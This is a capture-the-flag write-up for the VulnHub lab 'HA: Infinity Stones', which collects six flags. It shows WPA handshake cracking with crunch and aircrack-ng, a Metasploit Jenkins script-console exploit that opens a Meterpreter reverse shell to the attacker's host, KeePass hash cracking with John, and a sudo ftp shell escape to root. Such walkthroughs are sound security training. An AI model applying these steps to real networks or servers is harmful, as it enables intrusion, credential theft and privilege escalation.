• HA: Infinity Stones-Write-up



    • The theme is once again the Avengers, this time the Infinity Stones.

    Information gathering

    • The virtual machine's IP is 192.168.116.137:
    ➜  ~ nmap -sn 192.168.116.1/24      
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 19:53 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.0019s latency).
    Nmap scan report for 192.168.116.137
    Host is up (0.00076s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.55 seconds
    ➜  ~ nmap -A -T4 192.168.116.137 -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 20:09 CST
    Nmap scan report for 192.168.116.137
    Host is up (0.0091s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE  VERSION
    22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
    |   256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
    |_  256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
    80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA:Infinity Stones
    443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA:Infinity Stones
    | ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
    | Not valid before: 2019-09-15T17:18:57
    |_Not valid after:  2020-09-14T17:18:57
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    8080/tcp open  http     Jetty 9.4.z-SNAPSHOT
    | http-robots.txt: 1 disallowed entry 
    |_/
    |_http-server-header: Jetty(9.4.z-SNAPSHOT)
    |_http-title: Site doesn't have a title (text/html;charset=utf-8).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
    ➜  ~
    
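    • SSH and three web services:
    • Port 80: the home page shows pictures of the six stones, and there is also a quiz page.
    • Port 443: the certificate in the Nmap output looks abnormal at a glance, it is so long.
    • First stone obtained: MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
    • Port 8080: redirects to the Jenkins login page.
    • First, scan the directories on port 80: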
    ➜  ~ dirb http://192.168.116.137   
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Mon Sep 23 20:32:09 2019
    URL_BASE: http://192.168.116.137/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.137/ ----
    ==> DIRECTORY: http://192.168.116.137/images/                                                                                                                                                                                                 
    ==> DIRECTORY: http://192.168.116.137/img/                                                                                                                                                                                                    
    + http://192.168.116.137/index.html (CODE:200|SIZE:3261)                                                                                                                                                                                      
    + http://192.168.116.137/server-status (CODE:403|SIZE:280)                                                                                                                                                                                    
    ==> DIRECTORY: http://192.168.116.137/wifi/                                                                                                                                                                                                   
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/img/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/wifi/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Mon Sep 23 20:32:12 2019
    DOWNLOADED: 4612 - FOUND: 2
    ➜  ~
    
    • Three directories were found:
    http://192.168.116.137/wifi/
    http://192.168.116.137/img/
    http://192.168.116.137/images/
    

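    Cracking the WiFi password

    • In the wifi directory there is a pwd.txt that appears to contain the password rules, along with a packet capture; the password is presumably what decrypts that capture.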
    ➜  ~ curl "http://192.168.116.137/wifi/pwd.txt"    
    Your Password is thanos daughter name   "gam" (note it's all lower case) plus the following
    I enforced new password requirement on you ... 12 characters
    
    One uppercase charracter
    Two Numbers
    Two Lowercase
    The Year of first avengers came out in threatre
    ➜  ~
    
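    • The hint says the password starts with gam, all lowercase, followed by one uppercase letter, two digits, two lowercase letters, and the year the first Avengers film was released. For example gamA12bc2012, a 12-character password in total.
    • Generate the wordlist with crunch:
    %      digit
    ^      special character
    @      lowercase letter
    ,      uppercase letter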
    ---
    ➜  VulnHub crunch 12 12 -t gam,%%@@2012 -o dict.txt
    Crunch will now generate the following amount of data: 22848800 bytes
    21 MB
    0 GB
    0 TB
    0 PB
    Crunch will now generate the following number of lines: 1757600 
    
    crunch: 100% completed generating output
    ➜  VulnHub
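    • Added example (not part of the original write-up): why publishing the password composition rule in pwd.txt is the real weakness. The script parses the crunch mask used above and reproduces crunch's line and byte counts; the "^" class and all function names are assumptions made for this sketch.

```python
import math
import string

# Character classes behind the crunch -t placeholders in the legend above.
# "^" is assumed here to be ASCII punctuation plus space.
CLASSES = {
    "%": string.digits,
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "^": string.punctuation + " ",
}

MASK = "gam,%%@@2012"  # mask from the crunch command above


def mask_sets(mask):
    """One candidate alphabet per position; any other character is a literal."""
    return [CLASSES.get(ch, ch) for ch in mask]


def keyspace(mask):
    """Number of distinct passwords the mask can produce."""
    return math.prod(len(s) for s in mask_sets(mask))


def wordlist_bytes(mask):
    """Wordlist size: one newline-terminated line per candidate."""
    return keyspace(mask) * (len(mask) + 1)


def entropy_bits(mask):
    """Effective strength of a password known to follow the mask."""
    return math.log2(keyspace(mask))


def random_bits(length, alphabet_size):
    """Strength of a uniformly random password, for comparison."""
    return length * math.log2(alphabet_size)


def matches(mask, candidate):
    """True if the candidate is one of the passwords the mask generates."""
    sets = mask_sets(mask)
    return len(candidate) == len(sets) and all(
        c in s for c, s in zip(candidate, sets)
    )


def exhaust_seconds(mask, keys_per_second):
    """Worst-case time to try every candidate at a given test rate."""
    return keyspace(mask) / keys_per_second


if __name__ == "__main__":
    print("candidates      :", keyspace(MASK))
    print("wordlist bytes  :", wordlist_bytes(MASK))
    print("bits (policy)   : %.1f" % entropy_bits(MASK))
    print("bits (random 12): %.1f" % random_bits(12, 62))
    # 2277.47 keys/s is the rate aircrack-ng reports further down the page.
    print("worst case (s)  : %.0f" % exhaust_seconds(MASK, 2277.47))
```

    The 12-character requirement looks strong, but with seven positions fixed by the hint only about 21 bits of uncertainty remain, against roughly 71 bits for twelve random alphanumeric characters.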
    
    • Crack the WiFi password, a Kali beginner exercise.
    ➜  VulnHub aircrack-ng reality.cap -w dict.txt 
    Opening reality.capease wait...
    Read 4848 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  38:D5:47:42:EE:A0  Kavish_2.4Ghz             WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening reality.capease wait...
    Read 4848 packets.
    
    1 potential targets
    Aircrack-ng 1.5.2 
    
          [00:00:56] 128345/1757592 keys tested (2277.47 k/s) 
    
          Time left: 11 minutes, 55 seconds                          7.30%
    
                             KEY FOUND! [ gamA00fe2012 ]
    
    
          Master Key     : 90 EC 8F B0 CC E3 C5 0E EE AC AD 05 0B A9 08 47 
                           FD 4D 3E 55 60 7D B3 B0 92 21 FB 06 BA 96 53 90 
    
          Transient Key  : 66 85 68 5E A3 0C BD 5E 6E 3D ED 66 DC 07 76 9F 
                           08 5B CD E3 58 56 D6 AB 18 5C CC 75 7C 1D A3 E7 
                           87 BE 75 0F 24 EA 12 AC C5 EE 56 34 4C B5 3A 40 
                           73 77 F2 F3 D0 C7 DC E5 ED 5A A0 83 87 37 94 31 
    
          EAPOL HMAC     : AB 9A 17 CA 09 25 69 2B 71 06 76 EA F8 FE 23 67 
    ➜  VulnHub
    
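    • The password is gamA00fe2012, and the contents of the capture can then be inspected with Wireshark. At first I thought the flag was inside the capture, because I had run into that situation before. Since I have got this far, I will also write down how to decrypt an encrypted WiFi pcap, which is why you should not connect to unfamiliar WiFi hotspots.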
    ➜  VulnHub airdecap-ng -e Kavish_2.4Ghz -p gamA00fe2012 reality.cap 
    Total number of stations seen            5
    Total number of packets read          4848
    Total number of WEP data packets         0
    Total number of WPA data packets       245
    Number of plaintext data packets         0
    Number of decrypted WEP  packets         0
    Number of corrupted WEP  packets         0
    Number of decrypted WPA  packets       136
    Number of bad TKIP (WPA) packets         0
    Number of bad CCMP (WPA) packets         0
    
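    • When decryption finishes, a reality-dec.cap file is generated in the current directory by default; open it directly in Wireshark to see the data inside. Happy? Surprised? I don't tell just anyone.
    • Alternatively, add the WiFi password under IEEE 802.11 in the Protocols section of Wireshark's Preferences.
    • But after all that work, it turned out the flag was not in the capture at all, damn it. In fact the password is used as a URL path, and a file there holds the flag.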
    ➜  VulnHub curl "http://192.168.116.137/gamA00fe2012/realitystone.txt"
    REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
    ➜  VulnHub
    
    • Second stone obtained: REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

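    Quiz

    • The second clue, "Computers tells us Binary is the path to Reality.", is the hint on the quiz page. It is a small quiz: true is 1, false is 0, eight questions in total, and the resulting 8 digits are the URL path. I simply brute-forced it here, since I don't know English anyway.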
    ➜  VulnHub dirb http://192.168.116.137 01.txt 
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Tue Sep 24 00:16:29 2019
    URL_BASE: http://192.168.116.137/
    WORDLIST_FILES: 01.txt
    
    -----------------
    
    GENERATED WORDS: 256                                                           
    
    ---- Scanning URL: http://192.168.116.137/ ----
    ==> DIRECTORY: http://192.168.116.137/01101001/                                                                                                                                                                                               
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.137/01101001/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Tue Sep 24 00:16:29 2019
    DOWNLOADED: 256 - FOUND: 0
    ➜  VulnHub 
    ➜  VulnHub curl "http://192.168.116.137/01101001/hints.txt"           
    +++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
    +++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
    ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
    +++<] >++++ .+.<
    ➜  VulnHub
    
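    • The strange characters above are known as BF for short; the full name is not suitable for a blog. Decoding it online gives admin:avengers, which looks like a username and password for basic authentication; set it aside for now.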
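    • Added example (not part of the original write-up): the hint can be decoded offline with a few lines of Python, so text that may hold credentials never has to be pasted into a third-party online decoder. The interpreter below is a minimal sketch; the function name, tape size and step limit are choices made for this example.

```python
# Hint text exactly as returned by the curl request above.
HINT = r"""
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<
"""


def run_bf(program, stdin=b"", tape_len=30000, max_steps=1_000_000):
    """Interpret a BF program and return its output as text."""
    # Everything except the eight commands is a comment (here: the spaces).
    code = [c for c in program if c in "+-<>[].,"]

    # Pre-match brackets so malformed input is rejected before running.
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ']' at command %d" % i)
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at command %d" % stack[-1])

    tape = bytearray(tape_len)
    data = iter(stdin)
    out = bytearray()
    ptr = pc = steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:  # untrusted input may never terminate
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = next(data, 0)
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]  # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]  # repeat the loop body
        if not 0 <= ptr < tape_len:
            raise IndexError("data pointer left the tape")
        pc += 1
    return out.decode("ascii", errors="replace")


if __name__ == "__main__":
    print(run_bf(HINT))
```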

    Exif information

    • The img directory found by the scan above contains only one image; reading its Exif data with exiftool reveals the flag.
    ➜  VulnHub wget http://192.168.116.137/img/space.jpg                                       
    --2019-09-24 00:22:01--  http://192.168.116.137/img/space.jpg
    正在连接 192.168.116.137:80... 已连接。
    已发出 HTTP 请求,正在等待回应... 200 OK
    长度:17002 (17K) [image/jpeg]
    正在保存至: “space.jpg”
    
    space.jpg                                                   100%[==========================================================================================================================================>]  16.60K  --.-KB/s  用时 0s      
    
    2019-09-24 00:22:01 (98.5 MB/s) - 已保存 “space.jpg” [17002/17002])
    
    ➜  VulnHub exiftool space.jpg 
    ExifTool Version Number         : 11.50
    File Name                       : space.jpg
    Directory                       : .
    File Size                       : 17 kB
    File Modification Date/Time     : 2019:09:13 13:35:30+08:00
    File Access Date/Time           : 2019:09:24 00:22:01+08:00
    File Inode Change Date/Time     : 2019:09:24 00:22:01+08:00
    File Permissions                : rw-r--r--
    File Type                       : JPEG
    File Type Extension             : jpg
    MIME Type                       : image/jpeg
    JFIF Version                    : 1.01
    Resolution Unit                 : None
    X Resolution                    : 1
    Y Resolution                    : 1
    Comment                         : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
    Image Width                     : 768
    Image Height                    : 432
    Encoding Process                : Baseline DCT, Huffman coding
    Bits Per Sample                 : 8
    Color Components                : 3
    Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
    Image Size                      : 768x432
    Megapixels                      : 0.332
    ➜  VulnHub
    
    • Third stone obtained: SPACESTONE:{74E57403424607145B9B77809DEB49D0}

    Jenkins

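    • With the admin:avengers credentials found above, I tried logging in at http://192.168.116.137:8080/login?from=%2F, a Jenkins admin console, and the password was correct. First, a link for reference: https://github.com/gquere/pwn_jenkins. A git client RCE had come out just 8 days earlier and I wanted to give it a try; opening the plugin manager showed the version is 2.8.6, and the git plugin is vulnerable in versions <3.12.0, but the installed version is 3.12.1. MSF has an exploit script, which is very nice.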
    msf5 exploit(multi/http/jenkins_script_console) > show options 
    
    Module options (exploit/multi/http/jenkins_script_console):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       API_TOKEN                   no        The API token for the specified username
       PASSWORD   avengers         no        The password for the specified username
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS     192.168.116.137  yes       The target address range or CIDR identifier
       RPORT      8080             yes       The target port (TCP)
       SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT    8080             yes       The local port to listen on.
       SSL        false            no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
       TARGETURI  /                yes       The path to the Jenkins-CI application
       URIPATH                     no        The URI to use for this exploit (default is random)
       USERNAME   admin            no        The username to authenticate as
       VHOST                       no        HTTP server virtual host
    
    
    Exploit target:
    
       Id  Name
       --  ----
       1   Linux
    
    
    msf5 exploit(multi/http/jenkins_script_console) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Checking access to the script console
    [*] Logging in...
    [*] Using CSRF token: '8c428c023cf3d9b8ad5a0b5ec036aff8' (Jenkins-Crumb style)
    [*] 192.168.116.137:8080 - Sending Linux stager...
    [*] Sending stage (985320 bytes) to 192.168.116.137
    [*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.137:36498) at 2019-09-24 15:30:27 +0800
    
    meterpreter >
    
    • Upgrade to an interactive terminal: python3 -c 'import pty;pty.spawn("/bin/bash")'. There is no python in the PATH, but python3 is there.
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    jenkins@ubuntu:/home/morag$ find / -perm -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    /bin/umount
    /bin/su
    /bin/mount
    /bin/fusermount
    /bin/ping
    /bin/ntfs-3g
    /opt/script
    /usr/bin/chfn
    /usr/bin/pkexec
    /usr/bin/gpasswd
    /usr/bin/arping
    /usr/bin/chsh
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/bin/vmware-user-suid-wrapper
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/sbin/pppd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/xorg/Xorg.wrap
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /snap/core18/1144/bin/mount
    /snap/core18/1144/bin/ping
    /snap/core18/1144/bin/su
    /snap/core18/1144/bin/umount
    /snap/core18/1144/usr/bin/chfn
    /snap/core18/1144/usr/bin/chsh
    /snap/core18/1144/usr/bin/gpasswd
    /snap/core18/1144/usr/bin/newgrp
    /snap/core18/1144/usr/bin/passwd
    /snap/core18/1144/usr/bin/sudo
    /snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core18/1144/usr/lib/openssh/ssh-keysign
    /snap/core/7713/bin/mount
    /snap/core/7713/bin/ping
    /snap/core/7713/bin/ping6
    /snap/core/7713/bin/su
    /snap/core/7713/bin/umount
    /snap/core/7713/usr/bin/chfn
    /snap/core/7713/usr/bin/chsh
    /snap/core/7713/usr/bin/gpasswd
    /snap/core/7713/usr/bin/newgrp
    /snap/core/7713/usr/bin/passwd
    /snap/core/7713/usr/bin/sudo
    /snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/7713/usr/lib/openssh/ssh-keysign
    /snap/core/7713/usr/lib/snapd/snap-confine
    /snap/core/7713/usr/sbin/pppd
    /snap/core/6350/bin/mount
    /snap/core/6350/bin/ping
    /snap/core/6350/bin/ping6
    /snap/core/6350/bin/su
    /snap/core/6350/bin/umount
    /snap/core/6350/usr/bin/chfn
    /snap/core/6350/usr/bin/chsh
    /snap/core/6350/usr/bin/gpasswd
    /snap/core/6350/usr/bin/newgrp
    /snap/core/6350/usr/bin/passwd
    /snap/core/6350/usr/bin/sudo
    /snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/6350/usr/lib/openssh/ssh-keysign
    /snap/core/6350/usr/lib/snapd/snap-confine
    /snap/core/6350/usr/sbin/pppd
    jenkins@ubuntu:/home/morag$
    
    • Found /opt/script; run it:
    jenkins@ubuntu:/home/morag$ cd /opt
    cd /opt
    jenkins@ubuntu:/opt$ ls
    ls
    morag.kdbx  script
    jenkins@ubuntu:/opt$ ./script
    ./script
    TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$
    
    • Fourth stone: TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}

    Cracking KeePass

    • There is also a file with a .kdbx extension; morag is a username.
    TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$ file morag.kdbx
    file morag.kdbx
    morag.kdbx: Keepass password database 2.x KDBX
    jenkins@ubuntu:/opt$
    
    • Keepass password database 2.x KDBX: download it, convert it to a hash with keepass2john, then crack it with John.
    ➜  VulnHub keepass2john morag.kdbx 
    morag:$keepass$*2*60000*0*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0
    ➜  VulnHub keepass2john morag.kdbx >keepass.hash
    ➜  VulnHub john keepass.hash 
    Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
    Use the "--format=KeePass-opencl" option to force loading these as that type instead
    Using default input encoding: UTF-8
    Loaded 1 password hash (KeePass [SHA256 AES 32/64])
    Cost 1 (iteration count) is 60000 for all loaded hashes
    Cost 2 (version) is 2 for all loaded hashes
    Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
    Will run 4 OpenMP threads
    Proceeding with single, rules:Single
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
    Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
    Almost done: Processing the remaining buffered candidate passwords, if any.
    Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
    princesa         (morag)
    1g 0:00:00:13 DONE 2/3 (2019-09-24 16:03) 0.07283g/s 209.9p/s 209.9c/s 209.9C/s pretty..fuckyou1
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    ➜  VulnHub john keepass.hash --show
    morag:princesa
    
    1 password hash cracked, 0 left
    
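    • The credentials are morag:princesa; since I had seen a morag user in the home directory, they should come in handy. First open the morag.kdbx file with KeePass and enter the password; the stored password can be copied to the clipboard: An98XArsp1Ncj0hAZLda. That password turned out to be wrong, but the notes contain another piece of text. Guessing base64 blindly, decoding gives morag:yondu, so the password is yondu. Switching user from the Jenkins shell succeeded, and the SSH service can be logged into as well.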
    jenkins@ubuntu:/opt$ su morag
    su morag
    Password: yondu
    
    morag@ubuntu:/opt$ ls
    morag@ubuntu:~$ sudo -l
    sudo -l
    Matching Defaults entries for morag on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User morag may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/ftp
    morag@ubuntu:~$ 
    ftp> help
    help
    Commands may be abbreviated.  Commands are:
    
    !		dir		mdelete		qc		site
    $		disconnect	mdir		sendport	size
    account		exit		mget		put		status
    append		form		mkdir		pwd		struct
    ascii		get		mls		quit		system
    bell		glob		mode		quote		sunique
    binary		hash		modtime		recv		tenex
    bye		help		mput		reget		tick
    case		idle		newer		rstatus		trace
    cd		image		nmap		rhelp		type
    cdup		ipany		nlist		rename		user
    chmod		ipv4		ntrans		reset		umask
    close		ipv6		open		restart		verbose
    cr		lcd		prompt		rmdir		?
    delete		ls		passive		runique
    debug		macdef		proxy		send
    ftp> !/bin/bash
    !/bin/bash
    root@ubuntu:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~# 
    root@ubuntu:/root# ls
    ls
    final.txt
    root@ubuntu:/root# cat final.txt
    cat final.txt
    ┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬  ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐  ┬ ┬┌─┐┬ ┬  ┌─┐┌─┐┬ ┬┌┐┌┌┬┐  ┌┬┐┬ ┬┌─┐  ┌─┐┬┌┐┌┌─┐┬    ┌─┐┬  ┌─┐┌─┐  ┬┬
    ││║  │ │││││ ┬├┬┘├─┤ │ │ ││  ├─┤ │ ││ ││││└─┐  └┬┘│ ││ │  ├┤ │ ││ ││││ ││   │ ├─┤├┤   ├┤ ││││├─┤│    ├┤ │  ├─┤│ ┬  ││
    oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘   ┴ └─┘└─┘  └  └─┘└─┘┘└┘─┴┘   ┴ ┴ ┴└─┘  └  ┴┘└┘┴ ┴┴─┘  └  ┴─┘┴ ┴└─┘  oo
    
                                ,g@@@@@@g,
                               @@@@NMMN@@@g,gggpg,
                              ]@@@`    "@@@@@@@@@@@@  ,,,,
                              ]@@@      $@@@"   "%@@@@@@@@@@g
                              ]@@@      $@@@     ]@@@@M*"*%@@@g@@@@@@g
                              ]@@@      $@@@     ]@@@L     ]@@@@@NN@@@@g
                              ]@@@      $@@@     ]@@@`     ]@@@'    ]@@@L
                              ]@@@ggg   $@@@     ]@@@`     ]@@@      $@@P
                              ]@@@@@@L  $@@@@@@  ]@@@L     ]@@@      $@@P
                              ]@@@@@  1 "%@@@@F  '%@@@@@W  $@@@,,,   $@@P
                              ]@@@@@,    $@@@L  2  ]@@@M   '%@@@@@  ]@@@@,
                          ,,,,]@@@@@@@g@@@@@@@,   ,@@@@  3  $@@@'   '%@@@
                      ,g@@@@@@@@@@"%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4  ]@@@F
                     g@@@M*"""%@@@          '"MMMMM'"%@@@@@@@@@@@@g,,g@@@M
                    j@@@F     ]@@@                     "****' "%@@@@@@@@P
                    ]@@@L     ]@@@              ,ggggg,          ''"}$@@P
                    ]@@@L  g@@@@@@            g@@@@@@@@@g      j@@@  $@@P
                    ]@@@L  %NN@@@@           $@@@C   ]@@@@     ]@@@L $@@P
                    ]@@@L     '%M"          j@@@F  6  ]@@@     ]@@@L $@@P
                    ]@@@L                   '@@@@     $@@@     ]@@@L $@@P
                    ]@@@gg@@@@w              ]@@@@ggg@@@@L     ]@@@L]@@@L
                     %@@@@@@NM"               '%@@@@@@@M`     ;@@@M j@@@L
                     ]@@@@     ,@@g               ''`        #@@@M )@@@M
                     ]@@@L  5  $@@@                          `**`,@@@@F
                      ]@@@Wggg@@@@F                           ,g@@@@@`
                       "%@@@@@@@@@@@@@@@g                  ,@@@@@@@@@
                           '""*%N@@@@@@@M                   *MF" '$@@@
                                @@@@                          gg, j@@@,
                               $@@@`                         j@@@L %@@@
                              .@@@@                           %@@@ ]@@@
    
    
    
    			SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}    
    
    
    -----------Contact Undersigned to share your feedback with HACKING ARTICLES Teams-------------
    
    AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
    
    Kavish Tyagi: Tyagi_kavish_ Twitter
    
    • Fifth stone obtained: SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
    • One more is in the Flag label in KeePass: POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}
    • All six are collected, so snap your fingers.
  • Original article: https://www.cnblogs.com/Kali-Team/p/12212382.html